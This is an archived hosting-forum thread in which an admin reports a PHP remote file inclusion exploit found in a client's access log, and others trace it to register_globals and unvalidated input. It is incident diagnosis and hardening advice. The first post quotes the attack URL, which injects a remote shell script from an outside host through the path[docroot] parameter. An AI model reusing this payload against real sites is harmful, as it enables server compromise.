Knowledgebase

Portal Home > Knowledgebase > Articles Database > PHP exploit


PHP exploit




Posted by samsamdb, 11-25-2007, 04:00 PM
Just discovered a php exploit on a client's domain. Found this in the access_log http://www.domain.com/blog.php/onead...nhead.php?path[docroot] =http://musicrox1.altervista.org/rmod.txt?&act=ls&d=/home/httpd/vhosts/domain.com/httpdocs/pearus/.bash/ &sort=0a Take a look at rmod.txt http://musicrox1.altervista.org/rmod.txt then found this in a conf.txt in the /pearus/.bash folder contents of the .bash folder: Still trying to dig in some more to figure out how they were able to exploit here's the first few lines of their blog.php If anyone can think of anything else to dig for, please post .. thanks
Posted by Harzem, 11-25-2007, 04:04 PM
Is register_globals on?
Posted by Steve_Arm, 11-25-2007, 04:06 PM
Where is $path["docroot"] validated to be what it should be? You need to make this false: http://gr2.php.net/manual/en/ref.fil...llow-url-fopen
Posted by samsamdb, 11-25-2007, 04:07 PM
PHP 'safe_mode' on " is unchecked in the plesk control panel for that domain. but register_globals is On in the php.ini
Posted by samsamdb, 11-25-2007, 04:08 PM
I guess that's where the exploit is .. the customer didn't do any error checking so anyone can override docroot by passing it in the URL parameters ....
Posted by Harzem, 11-25-2007, 04:10 PM
That's where the exploit is. Turn off register_globals at all prices.
Posted by samsamdb, 11-25-2007, 04:17 PM
Done .. globals now off .. if a customer doesn't like it .. let's see what complaints come in ...
Posted by Harzem, 11-25-2007, 04:33 PM
The users that use php scripts written in 1985 will complain If too much is recieved, you should warn them about security and add a htaccess file for those you want. But let them know they will be asking for trouble.
Posted by samsamdb, 11-25-2007, 04:39 PM
I don't mind that at all ... if they complain, I'll threaten them with "Harzem"! :-)
Posted by foobic, 11-25-2007, 06:29 PM
It's a good idea to turn off register_globals but it won't necessarily solve this problem (although with a bit of luck it may break the script altogether!). Even with register_globals off badly-written scripts that don't validate user inputs can still be vulnerable to remote includes. So don't ignore the other good advice:


Was this answer helpful?

Add to Favourites Add to Favourites    Print this Article Print this Article

Also Read
LiteSpeed -> Apache (Views: 498)
Forum softwares in PHP 5? (Views: 527)
IP not blacklisted but email go to spam folder! (Views: 497)
Amazon EC2 very slow? (Views: 543)
Credit Card Fees ?? (Views: 498)

Language: